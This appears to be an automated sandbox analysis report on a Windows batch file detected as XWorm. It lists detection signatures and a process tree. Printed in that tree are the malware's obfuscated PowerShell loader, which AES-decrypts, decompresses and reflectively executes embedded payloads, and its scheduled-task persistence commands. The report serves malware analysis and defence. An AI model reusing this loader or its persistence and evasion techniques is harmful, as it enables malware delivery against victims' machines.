Edit tour
Windows
Analysis Report
Pollosappnuevo.bat
Overview
General Information
| Sample name: | Pollosappnuevo.bat |
| Analysis ID: | 1497356 |
| MD5: | 536ac91b5fe6a53fd85f5d7b609dc591 |
| SHA1: | 5fb565c1bec3e386642e921c34ea365fbcb07127 |
| SHA256: | ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9 |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected XWorm
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Powershell drops PE file
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 7752 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\Pollo sappnuevo. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
net.exe (PID: 7844 cmdline: net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7868 cmdline:
C:\Windows \system32\ net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) 
powershell.exe (PID: 7900 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('1IDZ 0tblUPImy6 +cAa/0r4uf KoB0X6q7gA xomXAbqns= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('ojV8xe k5mRtM5RXR DDIF7w==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $x CPmk=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $wkaLh= New-Object System.IO .MemoryStr eam; $VHSA V=New-Obje ct System. IO.Compres sion.GZipS tream($xCP mk, [IO.Co mpression. Compressio nMode]::De compress); $VHSAV.Co pyTo($wkaL h); $VHSAV .Dispose() ; $xCPmk.D ispose(); $wkaLh.Dis pose(); $w kaLh.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $cD SQK=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $xoAaG=$c DSQK.Entry Point; $xo AaG.Invoke ($null, $p aram2_var) ;}$ASmjg = 'C:\Users \user\Desk top\Pollos appnuevo.b at';$host. UI.RawUI.W indowTitle = $ASmjg; $eFpSQ=[Sy stem.IO.Fi le]::('txe TllAdaeR'[ -1..-11] - join '')($ ASmjg).Spl it([Enviro nment]::Ne wLine);for each ($lDE YJ in $eFp SQ) { if ( $lDEYJ.Sta rtsWith(': : ')) { $d XBjK=$lDEY J.Substrin g(3); brea k; }}$payl oads_var=[ string[]]$ dXBjK.Spli t('\');$pa yload1_var =decompres s_function (decrypt_ function ( [Convert]: :('gnirtS4 6esaBmorF' [-1..-16] -join '')( $payloads_ var[0]))); $payload2_ var=decomp ress_funct ion (decry pt_functio n ([Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')($payloa ds_var[1]) ));execute _function $payload1_ var $null; execute_fu nction $pa yload2_var (,[string []] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 8092 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Register-S cheduledTa sk -TaskNa me 'Runtim eBroker_st artup_616_ str' -Trig ger (New-S cheduledTa skTrigger -AtLogon) -Action (N ew-Schedul edTaskActi on -Execut e 'C:\User s\user\App Data\Roami ng\startup _str_616.v bs') -Sett ings (New- ScheduledT askSetting sSet -Allo wStartIfOn Batteries -Hidden -E xecutionTi meLimit 0) -RunLevel Highest - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
wscript.exe (PID: 3168 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\start up_str_616 .vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5692 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\startup _str_616.b at" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5664 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - net.exe (PID: 1172 cmdline:
net file MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 6320 cmdline:
C:\Windows \system32\ net1 file MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - powershell.exe (PID: 5264 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -command function decrypt_fu nction($pa ram_var){ $aes_var=[ System.Sec urity.Cryp tography.A es]::Creat e(); $aes_ var.Mode=[ System.Sec urity.Cryp tography.C ipherMode] ::CBC; $ae s_var.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7; $aes_ var.Key=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('1IDZ 0tblUPImy6 +cAa/0r4uf KoB0X6q7gA xomXAbqns= '); $aes_v ar.IV=[Sys tem.Conver t]::('gnir tS46esaBmo rF'[-1..-1 6] -join ' ')('ojV8xe k5mRtM5RXR DDIF7w==') ; $decrypt or_var=$ae s_var.Crea teDecrypto r(); $retu rn_var=$de cryptor_va r.Transfor mFinalBloc k($param_v ar, 0, $pa ram_var.Le ngth); $de cryptor_va r.Dispose( ); $aes_va r.Dispose( ); $return _var;}func tion decom press_func tion($para m_var){ $x CPmk=New-O bject Syst em.IO.Memo ryStream(, $param_var ); $wkaLh= New-Object System.IO .MemoryStr eam; $VHSA V=New-Obje ct System. IO.Compres sion.GZipS tream($xCP mk, [IO.Co mpression. Compressio nMode]::De compress); $VHSAV.Co pyTo($wkaL h); $VHSAV .Dispose() ; $xCPmk.D ispose(); $wkaLh.Dis pose(); $w kaLh.ToArr ay();}func tion execu te_functio n($param_v ar,$param2 _var){ $cD SQK=[Syste m.Reflecti on.Assembl y]::('daoL '[-1..-4] -join '')( [byte[]]$p aram_var); $xoAaG=$c DSQK.Entry Point; $xo AaG.Invoke ($null, $p aram2_var) ;}$ASmjg = 'C:\Users \user\AppD ata\Roamin g\startup_ str_616.ba t';$host.U I.RawUI.Wi ndowTitle = $ASmjg;$ eFpSQ=[Sys tem.IO.Fil e]::('txeT llAdaeR'[- 1..-11] -j oin '')($A Smjg).Spli t([Environ ment]::New Line);fore ach ($lDEY J in $eFpS Q) { if ($ lDEYJ.Star tsWith(':: ')) { $dX BjK=$lDEYJ .Substring (3); break ; }}$paylo ads_var=[s tring[]]$d XBjK.Split ('\');$pay load1_var= decompress _function (decrypt_f unction ([ Convert]:: ('gnirtS46 esaBmorF'[ -1..-16] - join '')($ payloads_v ar[0])));$ payload2_v ar=decompr ess_functi on (decryp t_function ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($payload s_var[1])) );execute_ function $ payload1_v ar $null;e xecute_fun ction $pay load2_var (,[string[ ]] ('')); MD5: 04029E121A0CFA5991749937DD22A1D9) - schtasks.exe (PID: 7812 cmdline:
"C:\Window s\System32 \schtasks. exe" /crea te /f /RL HIGHEST /s c minute / mo 1 /tn " e45iasd" / tr "C:\Use rs\user\Ap pData\Loca l\Temp\e45 iasd.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2) - conhost.exe (PID: 7836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7336 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\App Data\Roami ng\startup _str_616.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- e45iasd.exe (PID: 1528 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\e45iasd .exe MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 2524 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\e45ias d.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- e45iasd.exe (PID: 4020 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\e45ias d.exe" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4144 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Thomas Patzke: | ||